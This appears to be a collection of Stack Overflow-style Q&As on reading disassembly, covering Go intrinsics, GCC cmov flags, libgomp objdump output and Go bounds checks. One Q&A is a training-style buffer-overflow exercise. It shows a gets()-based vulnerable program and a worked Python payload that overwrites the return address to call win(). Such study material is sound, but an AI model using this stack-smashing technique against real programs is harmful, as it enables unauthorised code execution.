Is math/bits in Go using machine code instructions?

The new Go package math/bits provides useful functions. The source code shows how the function results are computed.
Are these functions replaced by the corresponding processor opcodes when available?

Yes, as stated in Go 1.9 Release Notes: New bit manipulation package:
Go 1.9 includes a new package, math/bits, with optimized implementations for manipulating bits. On most architectures, functions in this package are additionally recognized by the compiler and treated as intrinsics for additional performance.
Some related / historical GitHub issues:
math/bits: an integer bit twiddling library #18616
proposal: cmd/compile: intrinsicify user defined assembly functions #17373
Provide a builtin for population counting / hamming distance #10757

Yes, it does. You can see an example of it working below.
First, compile this program:
package main

import (
    "fmt"
    "math/bits"
)

func count(i uint) {
    fmt.Printf("%d has %d length\n", i, bits.Len(i))
}

func main() {
    for i := uint(0); i < 100; i++ {
        count(i)
    }
}
Then look at the disassembly. Note the BSR instruction (Bit Scan Reverse), which, per the manual: "Searches the value in a register or a memory location (second operand) for the most-significant set bit."
0000000000489620 <main.count>:
489620: 64 48 8b 0c 25 f8 ff mov %fs:0xfffffffffffffff8,%rcx
489627: ff ff
489629: 48 3b 61 10 cmp 0x10(%rcx),%rsp
48962d: 0f 86 f2 00 00 00 jbe 489725 <main.count+0x105>
489633: 48 83 ec 78 sub $0x78,%rsp
489637: 48 89 6c 24 70 mov %rbp,0x70(%rsp)
48963c: 48 8d 6c 24 70 lea 0x70(%rsp),%rbp
489641: 48 8b 84 24 80 00 00 mov 0x80(%rsp),%rax
489648: 00
489649: 48 0f bd c8 bsr %rax,%rcx ; **** Bit scan reverse instruction ***
48964d: 48 89 44 24 48 mov %rax,0x48(%rsp)
489652: 48 c7 c0 ff ff ff ff mov $0xffffffffffffffff,%rax
489659: 48 0f 44 c8 cmove %rax,%rcx
48965d: 48 8d 41 01 lea 0x1(%rcx),%rax

Removing CMOV Instructions using GCC-9.2.0 (x86)

I am looking to compile a set of benchmark suites using traditional GCC optimizations (as in using -O2/3) and comparing this with the same benchmarks using no cmov instructions. I have seen several posts/websites addressing this issue (all from several years ago and therefore referencing an older GCC than 9.2.0). Essentially, the answers from these were to use the following four flags (this is a good summary of everything I've found online):
-fno-if-conversion -fno-if-conversion2 -fno-tree-loop-if-convert -fno-tree-loop-if-convert-stores
Following this advice, I am using the following command to compile my benchmarks (theoretically with no cmov instructions).
g++-9.2.0 -std=c++11 -O2 -g -fno-if-conversion -fno-if-conversion2 -fno-tree-loop-if-convert -fno-tree-loop-if-convert-stores -fno-inline *.C -o bfs-nocmov
However, I am still finding instances where cmov is being used. If I change the optimization flag to -O0, the cmov instructions are not generated, so I am assuming there must be some way to disable this in GCC without modifying the C code/assembly.
Below is a code snippet example of what I am trying to disable (the last instruction is the cmov I am looking to avoid):
int mx = 0;
for (int i=0; i < n; i++)
41bc8a: 45 85 e4 test %r12d,%r12d
41bc8d: 7e 71 jle 41bd00 <_Z11suffixArrayPhi+0xe0>
41bc8f: 41 8d 44 24 ff lea -0x1(%r12),%eax
41bc94: 48 89 df mov %rbx,%rdi
.../suffix/src/ks.C:92
int mx = 0;
41bc97: 31 c9 xor %ecx,%ecx
41bc99: 48 8d 54 03 01 lea 0x1(%rbx,%rax,1),%rdx
41bc9e: 66 90 xchg %ax,%ax
.../suffix/src/ks.C:94
if (s[i] > mx) mx = s[i];
41bca0: 44 0f b6 07 movzbl (%rdi),%r8d
41bca4: 44 39 c1 cmp %r8d,%ecx
41bca7: 41 0f 4c c8 cmovl %r8d,%ecx
Finally, here is the code snippet generated by using -O0. I cannot use any optimization level lower than -O2, and while manually manipulating the code is an option I have a lot of benchmarks I am using so I would like to find a general solution.
for (int i=0; i < n; i++)
c67: 8b 45 e8 mov -0x18(%rbp),%eax
c6a: 3b 45 d4 cmp -0x2c(%rbp),%eax
c6d: 7d 34 jge ca3 <_Z11suffixArrayPhi+0x105>
.../suffix/src/ks.C:94
if (s[i] > mx) mx = s[i];
c6f: 8b 45 e8 mov -0x18(%rbp),%eax
c72: 48 63 d0 movslq %eax,%rdx
c75: 48 8b 45 d8 mov -0x28(%rbp),%rax
c79: 48 01 d0 add %rdx,%rax
c7c: 0f b6 00 movzbl (%rax),%eax
c7f: 0f b6 c0 movzbl %al,%eax
c82: 39 45 e4 cmp %eax,-0x1c(%rbp)
c85: 7d 16 jge c9d <_Z11suffixArrayPhi+0xff>
.../suffix/src/ks.C:94 (discriminator 1)
c87: 8b 45 e8 mov -0x18(%rbp),%eax
c8a: 48 63 d0 movslq %eax,%rdx
c8d: 48 8b 45 d8 mov -0x28(%rbp),%rax
c91: 48 01 d0 add %rdx,%rax
c94: 0f b6 00 movzbl (%rax),%eax
c97: 0f b6 c0 movzbl %al,%eax
c9a: 89 45 e4 mov %eax,-0x1c(%rbp)
If somebody has any advice or direction to look in, it would be much appreciated.

Buffer overflow: overwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following:
xor ch, 0
...
cmp dword ptr [ebp+10h], 0F00DB4BE
Now, if I supply two different 4-byte arguments as part of my exploit, i.e. ABCDEFGH (assume ABCD is the first argument, EFGH the second), CH becomes G. So naturally I thought about crafting the following (assume ABCD is right):
ABCD\x00\x0d\x00\x00
What happens, however, is that null bytes seem to be ignored! Sending the above results in CH = 0 and CL = 0xd. This happens no matter where I put \x0d, i.e.:
ABCD\x0d\x00\x00\x00
ABCD\x00\x0d\x00\x00
ABCD\x00\x00\x0d\x00
ABCD\x00\x00\x00\x0d
all yield that same behavior.
How can I proceed to only overwrite CH while leaving the rest of ECX as null?
EDIT: see my own answer below. The short version is that bash ignores null bytes and it explains, partially, why the exploit didn't work locally. The exact reason can be found here. Thanks to Michael Petch for pointing it out!
Source:
#include <stdio.h>
#include <stdlib.h>

void win(long long arg1, int arg2)
{
    if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
    {
        puts("Close, but not quite.");
        exit(1);
    }
    printf("You win!\n");
}

void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}

int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);
    vuln();
    return 0;
}
The relevant part of objdump's disassembly of the executable is:
080491c2 <win>:
80491c2: 55 push %ebp
80491c3: 89 e5 mov %esp,%ebp
80491c5: 81 ec 28 01 00 00 sub $0x128,%esp
80491cb: 8b 4d 08 mov 0x8(%ebp),%ecx
80491ce: 89 8d e0 fe ff ff mov %ecx,-0x120(%ebp)
80491d4: 8b 4d 0c mov 0xc(%ebp),%ecx
80491d7: 89 8d e4 fe ff ff mov %ecx,-0x11c(%ebp)
80491dd: 8b 8d e0 fe ff ff mov -0x120(%ebp),%ecx
80491e3: 81 f1 55 da b4 14 xor $0x14b4da55,%ecx
80491e9: 89 c8 mov %ecx,%eax
80491eb: 8b 8d e4 fe ff ff mov -0x11c(%ebp),%ecx
80491f1: 80 f5 00 xor $0x0,%ch
80491f4: 89 ca mov %ecx,%edx
80491f6: 09 d0 or %edx,%eax
80491f8: 85 c0 test %eax,%eax
80491fa: 75 09 jne 8049205 <win+0x43>
80491fc: 81 7d 10 be b4 0d f0 cmpl $0xf00db4be,0x10(%ebp)
8049203: 74 1a je 804921f <win+0x5d>
8049205: 83 ec 0c sub $0xc,%esp
8049208: 68 08 a0 04 08 push $0x804a008
804920d: e8 4e fe ff ff call 8049060 <puts#plt>
8049212: 83 c4 10 add $0x10,%esp
8049215: 83 ec 0c sub $0xc,%esp
8049218: 6a 01 push $0x1
804921a: e8 51 fe ff ff call 8049070 <exit#plt>
804921f: 83 ec 0c sub $0xc,%esp
8049222: 68 1e a0 04 08 push $0x804a01e
8049227: e8 34 fe ff ff call 8049060 <puts#plt>
804922c: 83 c4 10 add $0x10,%esp
804922f: 83 ec 08 sub $0x8,%esp
8049232: 68 27 a0 04 08 push $0x804a027
8049237: 68 29 a0 04 08 push $0x804a029
804923c: e8 5f fe ff ff call 80490a0 <fopen#plt>
8049241: 83 c4 10 add $0x10,%esp
8049244: 89 45 f4 mov %eax,-0xc(%ebp)
8049247: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
804924b: 75 12 jne 804925f <win+0x9d>
804924d: 83 ec 0c sub $0xc,%esp
8049250: 68 34 a0 04 08 push $0x804a034
8049255: e8 06 fe ff ff call 8049060 <puts#plt>
804925a: 83 c4 10 add $0x10,%esp
804925d: eb 31 jmp 8049290 <win+0xce>
804925f: 83 ec 04 sub $0x4,%esp
8049262: ff 75 f4 pushl -0xc(%ebp)
8049265: 68 00 01 00 00 push $0x100
804926a: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049270: 50 push %eax
8049271: e8 da fd ff ff call 8049050 <fgets#plt>
8049276: 83 c4 10 add $0x10,%esp
8049279: 83 ec 08 sub $0x8,%esp
804927c: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049282: 50 push %eax
8049283: 68 86 a0 04 08 push $0x804a086
8049288: e8 a3 fd ff ff call 8049030 <printf#plt>
804928d: 83 c4 10 add $0x10,%esp
8049290: 90 nop
8049291: c9 leave
8049292: c3 ret
08049293 <vuln>:
8049293: 55 push %ebp
8049294: 89 e5 mov %esp,%ebp
8049296: 83 ec 18 sub $0x18,%esp
8049299: 83 ec 0c sub $0xc,%esp
804929c: 68 90 a0 04 08 push $0x804a090
80492a1: e8 8a fd ff ff call 8049030 <printf#plt>
80492a6: 83 c4 10 add $0x10,%esp
80492a9: 83 ec 0c sub $0xc,%esp
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets#plt>
80492b5: 83 c4 10 add $0x10,%esp
80492b8: 83 ec 08 sub $0x8,%esp
80492bb: 8d 45 e8 lea -0x18(%ebp),%eax
80492be: 50 push %eax
80492bf: 68 a0 a0 04 08 push $0x804a0a0
80492c4: e8 67 fd ff ff call 8049030 <printf#plt>
80492c9: 83 c4 10 add $0x10,%esp
80492cc: 90 nop
80492cd: c9 leave
80492ce: c3 ret
080492cf <main>:
80492cf: 8d 4c 24 04 lea 0x4(%esp),%ecx
80492d3: 83 e4 f0 and $0xfffffff0,%esp
80492d6: ff 71 fc pushl -0x4(%ecx)
80492d9: 55 push %ebp
80492da: 89 e5 mov %esp,%ebp
80492dc: 51 push %ecx
80492dd: 83 ec 04 sub $0x4,%esp
80492e0: a1 34 c0 04 08 mov 0x804c034,%eax
80492e5: 6a 00 push $0x0
80492e7: 6a 02 push $0x2
80492e9: 6a 00 push $0x0
80492eb: 50 push %eax
80492ec: e8 9f fd ff ff call 8049090 <setvbuf#plt>
80492f1: 83 c4 10 add $0x10,%esp
80492f4: e8 9a ff ff ff call 8049293 <vuln>
80492f9: b8 00 00 00 00 mov $0x0,%eax
80492fe: 8b 4d fc mov -0x4(%ebp),%ecx
8049301: c9 leave
8049302: 8d 61 fc lea -0x4(%ecx),%esp
8049305: c3 ret
It is unclear why you are hung up on the value in ECX or the xor ch, 0 instruction inside the win function. From the C code it is clear that the check for a win requires that the 64-bit (long long) arg1 to be 0x14B4DA55 and arg2 needs to be 0xF00DB4BE. When that condition is met it will print You win!
We need a buffer exploit capable of executing the win function while making it appear that it is being passed a 64-bit long long as the first argument and a 32-bit int as the second.
The most obvious way to pull this off is to overrun buf in function vuln, strategically overwriting the return address with the address of win. In the disassembled output, win is at 0x080491c2. We will need to write 0x080491c2, followed by some dummy value for a return address, followed by the 64-bit value 0x14B4DA55 (same as 0x0000000014B4DA55), followed by the 32-bit value 0xF00DB4BE.
The dummy value for a return address is needed because we need to simulate a function call on the stack: we won't be issuing a call instruction, so we have to make it appear as if one had been executed. The goal is to print You win!; whether the program crashes afterwards is irrelevant.
The return address (win), arg1, and arg2 will have to be stored as bytes in reverse order since the x86 processors are little endian.
The last big question is: how many bytes do we have to feed to gets to overrun the buffer and reach the return address? You could use trial and error (brute force) to figure this out, but we can look at the disassembly of the call to gets:
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets#plt>
LEA is being used to compute the address (effective address) of buf on the stack and pass it as the first argument to gets. 0x18 is 24 bytes (decimal). Although buf was defined to be 16 bytes in length, the compiler allocated additional space for alignment purposes. We have to add another 4 bytes to account for the fact that the function prologue pushed EBP on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.
Using Python to generate the input sequence is common in many tutorials. Embedding NUL (\0) characters in a shell string directly may cause the shell to prematurely terminate the string at the NUL byte (an issue people have when using Bash). We can pipe the byte sequence to our program using something like:
python -c 'print "A"*28+"\xc2\x91\x04\x08" \
+"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname
Where progname is the name of your executable. When run it should appear similar to:
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
You win!
Segmentation fault
Note: the 4 characters making up the return address between the A's and the B's are unprintable, so they don't appear in the console output, but they are still present, as are all the other unprintable bytes.
As a limited answer to my own question, specifically regarding why null bytes are ignored:
It seems to be an issue with Bash ignoring null bytes.
Many of my peers faced the same problem when writing the exploit. It would work on the server but not locally, when using gdb for example. Bash would simply disregard the null bytes, and thus \x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0 would be read in as \x55\xda\xb4\x14\xbe\xb4\x0d\xf0. The exact reason why it behaves that way still eludes me, but it's a good thing to keep in mind!

Objdump disassemble doesn't match source code

I'm investigating the execution flow of an OpenMP program linked to libgomp. It uses #pragma omp parallel for. I already know that this construct becomes, among other things, a call to the GOMP_parallel function, which is implemented as follows:
void
GOMP_parallel (void (*fn) (void *), void *data,
               unsigned num_threads, unsigned int flags)
{
  num_threads = gomp_resolve_num_threads (num_threads, 0);
  gomp_team_start (fn, data, num_threads, flags, gomp_new_team (num_threads));
  fn (data);
  ialias_call (GOMP_parallel_end) ();
}
When executing objdump -d on libgomp, GOMP_parallel appears as:
000000000000bc80 <GOMP_parallel##GOMP_4.0>:
bc80: 41 55 push %r13
bc82: 41 54 push %r12
bc84: 41 89 cd mov %ecx,%r13d
bc87: 55 push %rbp
bc88: 53 push %rbx
bc89: 48 89 f5 mov %rsi,%rbp
bc8c: 48 89 fb mov %rdi,%rbx
bc8f: 31 f6 xor %esi,%esi
bc91: 89 d7 mov %edx,%edi
bc93: 48 83 ec 08 sub $0x8,%rsp
bc97: e8 d4 fd ff ff callq ba70 <GOMP_ordered_end##GOMP_1.0+0x70>
bc9c: 41 89 c4 mov %eax,%r12d
bc9f: 89 c7 mov %eax,%edi
bca1: e8 ca 37 00 00 callq f470 <omp_in_final##OMP_3.1+0x2c0>
bca6: 44 89 e9 mov %r13d,%ecx
bca9: 44 89 e2 mov %r12d,%edx
bcac: 48 89 ee mov %rbp,%rsi
bcaf: 48 89 df mov %rbx,%rdi
bcb2: 49 89 c0 mov %rax,%r8
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final##OMP_3.1+0x420>
bcba: 48 89 ef mov %rbp,%rdi
bcbd: ff d3 callq *%rbx
bcbf: 48 83 c4 08 add $0x8,%rsp
bcc3: 5b pop %rbx
bcc4: 5d pop %rbp
bcc5: 41 5c pop %r12
bcc7: 41 5d pop %r13
bcc9: e9 32 ff ff ff jmpq bc00 <GOMP_parallel_end##GOMP_1.0>
bcce: 66 90 xchg %ax,%ax
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example. Second, that function consists of:
void
GOMP_ordered_end (void)
{
}
According to the objdump output, this function starts at ba00 and finishes at bbbd. How can there be so much code in a function that is empty? By the way, there is a comment in the source code of libgomp saying that it should appear only when using the ORDERED construct (as the name suggests), which is not the case in my test.
Finally, the main concern for me is: why does the source code differ so much from the disassembly? Why, for example, isn't there any mention of gomp_team_start in the assembly?
The system has gcc version 5.4.0.
According to the objdump output, this function starts at ba00 and finishes at bbbd.
How could it have so much code in a function that is empty?
The function itself is small, but GCC used some additional bytes to align the next function and to store some static data (probably used by other functions in this file). Here's what I see in a local ordered.o:
00000000000003b0 <GOMP_ordered_end>:
3b0: f3 c3 repz retq
3b2: 66 66 66 66 66 2e 0f data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
3b9: 1f 84 00 00 00 00 00
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example.
Don't get distracted by the GOMP_ordered_end##GOMP_1.0+0x70 marker in the assembly code. All it says is that this call targets some local library function (for which objdump didn't find any symbol info) that happens to be located 112 bytes after GOMP_ordered_end. This is most likely gomp_resolve_num_threads.
Why, for example, isn't there any mention to gomp_team_start in the assembly?
Hm, this looks pretty much like it:
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final##OMP_3.1+0x420>

golang: index efficiency of array

It's a simple program.
test environment: debian 8, go 1.4.2
union.go:
package main

import "fmt"

type A struct {
    t int32
    u int64
}

func test() (total int64) {
    a := [...]A{{1, 100}, {2, 3}}
    for i := 0; i < 5000000000; i++ {
        p := &a[i%2]
        total += p.u
    }
    return
}

func main() {
    total := test()
    fmt.Println(total)
}
union.c:
#include <stdio.h>

struct A {
    int t;
    long u;
};

long test()
{
    struct A a[2];
    a[0].t = 1;
    a[0].u = 100;
    a[1].t = 2;
    a[1].u = 3;
    long total = 0;
    long i;
    for (i = 0; i < 5000000000; i++) {
        struct A* p = &a[i % 2];
        total += p->u;
    }
    return total;
}

int main()
{
    long total = test();
    printf("%ld\n", total);
}
Result comparison:
go:
257500000000
real 0m9.167s
user 0m9.196s
sys 0m0.012s
C:
257500000000
real 0m3.585s
user 0m3.560s
sys 0m0.008s
It seems that the Go compiler generates a lot of odd assembly (you can use objdump -D to check it).
For example, why does movabs $0x12a05f200,%rbp appear twice?
400c60: 31 c0 xor %eax,%eax
400c62: 48 bd 00 f2 05 2a 01 movabs $0x12a05f200,%rbp
400c69: 00 00 00
400c6c: 48 39 e8 cmp %rbp,%rax
400c6f: 7d 46 jge 400cb7 <main.test+0xb7>
400c71: 48 89 c1 mov %rax,%rcx
400c74: 48 c1 f9 3f sar $0x3f,%rcx
400c78: 48 89 c3 mov %rax,%rbx
400c7b: 48 29 cb sub %rcx,%rbx
400c7e: 48 83 e3 01 and $0x1,%rbx
400c82: 48 01 cb add %rcx,%rbx
400c85: 48 8d 2c 24 lea (%rsp),%rbp
400c89: 48 83 fb 02 cmp $0x2,%rbx
400c8d: 73 2d jae 400cbc <main.test+0xbc>
400c8f: 48 6b db 10 imul $0x10,%rbx,%rbx
400c93: 48 01 dd add %rbx,%rbp
400c96: 48 8b 5d 08 mov 0x8(%rbp),%rbx
400c9a: 48 01 f3 add %rsi,%rbx
400c9d: 48 89 de mov %rbx,%rsi
400ca0: 48 89 5c 24 28 mov %rbx,0x28(%rsp)
400ca5: 48 ff c0 inc %rax
400ca8: 48 bd 00 f2 05 2a 01 movabs $0x12a05f200,%rbp
400caf: 00 00 00
400cb2: 48 39 e8 cmp %rbp,%rax
400cb5: 7c ba jl 400c71 <main.test+0x71>
400cb7: 48 83 c4 20 add $0x20,%rsp
400cbb: c3 retq
400cbc: e8 6f e0 00 00 callq 40ed30 <runtime.panicindex>
400cc1: 0f 0b ud2
...
while the C assembly is cleaner:
0000000000400570 <test>:
400570: 48 c7 44 24 e0 64 00 movq $0x64,-0x20(%rsp)
400577: 00 00
400579: 48 c7 44 24 f0 03 00 movq $0x3,-0x10(%rsp)
400580: 00 00
400582: b9 64 00 00 00 mov $0x64,%ecx
400587: 31 d2 xor %edx,%edx
400589: 31 c0 xor %eax,%eax
40058b: 48 be 00 f2 05 2a 01 movabs $0x12a05f200,%rsi
400592: 00 00 00
400595: eb 18 jmp 4005af <test+0x3f>
400597: 66 0f 1f 84 00 00 00 nopw 0x0(%rax,%rax,1)
40059e: 00 00
4005a0: 48 89 d1 mov %rdx,%rcx
4005a3: 83 e1 01 and $0x1,%ecx
4005a6: 48 c1 e1 04 shl $0x4,%rcx
4005aa: 48 8b 4c 0c e0 mov -0x20(%rsp,%rcx,1),%rcx
4005af: 48 83 c2 01 add $0x1,%rdx
4005b3: 48 01 c8 add %rcx,%rax
4005b6: 48 39 f2 cmp %rsi,%rdx
4005b9: 75 e5 jne 4005a0 <test+0x30>
4005bb: f3 c3 repz retq
4005bd: 0f 1f 00 nopl (%rax)
Could somebody explain it? Thanks!
The main difference is the array bounds checking. In the disassembly dump for the Go program, there is:
400c89: 48 83 fb 02 cmp $0x2,%rbx
400c8d: 73 2d jae 400cbc <main.test+0xbc>
...
400cbc: e8 6f e0 00 00 callq 40ed30 <runtime.panicindex>
400cc1: 0f 0b ud2
So if %rbx is greater than or equal to 2, then it jumps down to a call to runtime.panicindex. Given you're working with an array of size 2, that is clearly the bounds check. You could make the argument that the compiler should be smart enough to skip the bounds check in this particular case where the range of the index can be determined statically, but it seems that it isn't smart enough to do so yet.
While you're seeing a noticeable performance difference in this micro-benchmark, it might be worth considering whether it is representative of your real code. If you're doing other work in the loop, the difference is likely to be less noticeable.
And while bounds checking does have a cost, in many cases it is better than the alternative of the program continuing with undefined behaviour.

Why are ternary and logical operators more efficient than if branches?

I stumbled upon this question/answer which mentions that in most languages, logical operators such as:
x == y && doSomething();
can be faster than doing the same thing with an if branch:
if(x == y) {
doSomething();
}
Similarly, it says that the ternary operator:
x = y == z ? 0 : 1
is usually faster than using an if branch:
if(y == z) {
x = 0;
} else {
x = 1;
}
This got me Googling, which led me to this fantastic answer which explains branch prediction.
Basically, what it says is that the CPU operates at very fast speeds, and rather than slowing down to compute every if branch, it tries to guess what outcome will take place and places the appropriate instructions in its pipeline. But if it makes the wrong guess, it will have to back up and recompute the appropriate instructions.
But this still doesn't explain to me why logical operators or the ternary operator are treated differently than if branches. Since the CPU doesn't know the outcome of x == y, shouldn't it still have to guess whether to place the call to doSomething() (and therefore, all of doSomething's code) into its pipeline? And, therefore, back up if its guess was incorrect? Similarly, for the ternary operator, shouldn't the CPU have to guess whether y == z will evaluate to true when determining what to store in x, and back up if its guess was wrong?
I don't understand why if branches are treated any differently by the compiler than any other statement which is conditional. Shouldn't all conditionals be evaluated the same way?
Short answer: it simply isn't. While helping branch prediction can improve your performance, writing the condition as a logical operator instead of an if branch doesn't change the compiled code.
If you want to help branch prediction, use __builtin_expect (for GCC and Clang).
To emphasize let's compare the compiler output:
#include <stdio.h>

int main(){
    int foo;
    scanf("%d", &foo); /* Needed to eliminate optimizations */
#ifdef IF
    if (foo)
        printf("Foo!");
#else
    foo && printf("Foo!");
#endif
    return 0;
}
For gcc -O3 branch.c -DIF
We get:
0000000000400540 <main>:
400540: 48 83 ec 18 sub $0x18,%rsp
400544: 31 c0 xor %eax,%eax
400546: bf 68 06 40 00 mov $0x400668,%edi
40054b: 48 8d 74 24 0c lea 0xc(%rsp),%rsi
400550: e8 e3 fe ff ff callq 400438 <__isoc99_scanf#plt>
400555: 8b 44 24 0c mov 0xc(%rsp),%eax
400559: 85 c0 test %eax,%eax #This is the relevant part
40055b: 74 0c je 400569 <main+0x29>
40055d: bf 6b 06 40 00 mov $0x40066b,%edi
400562: 31 c0 xor %eax,%eax
400564: e8 af fe ff ff callq 400418 <printf#plt>
400569: 31 c0 xor %eax,%eax
40056b: 48 83 c4 18 add $0x18,%rsp
40056f: c3 retq
And for gcc -O3 branch.c
0000000000400540 <main>:
400540: 48 83 ec 18 sub $0x18,%rsp
400544: 31 c0 xor %eax,%eax
400546: bf 68 06 40 00 mov $0x400668,%edi
40054b: 48 8d 74 24 0c lea 0xc(%rsp),%rsi
400550: e8 e3 fe ff ff callq 400438 <__isoc99_scanf#plt>
400555: 8b 44 24 0c mov 0xc(%rsp),%eax
400559: 85 c0 test %eax,%eax
40055b: 74 0c je 400569 <main+0x29>
40055d: bf 6b 06 40 00 mov $0x40066b,%edi
400562: 31 c0 xor %eax,%eax
400564: e8 af fe ff ff callq 400418 <printf#plt>
400569: 31 c0 xor %eax,%eax
40056b: 48 83 c4 18 add $0x18,%rsp
40056f: c3 retq
This is exactly the same code.
The question you linked to measures performance for JavaScript. Note that there the two forms may be translated differently, since JavaScript is interpreted or JIT-compiled depending on the engine.
In any case, JavaScript is not the best vehicle for learning about performance.
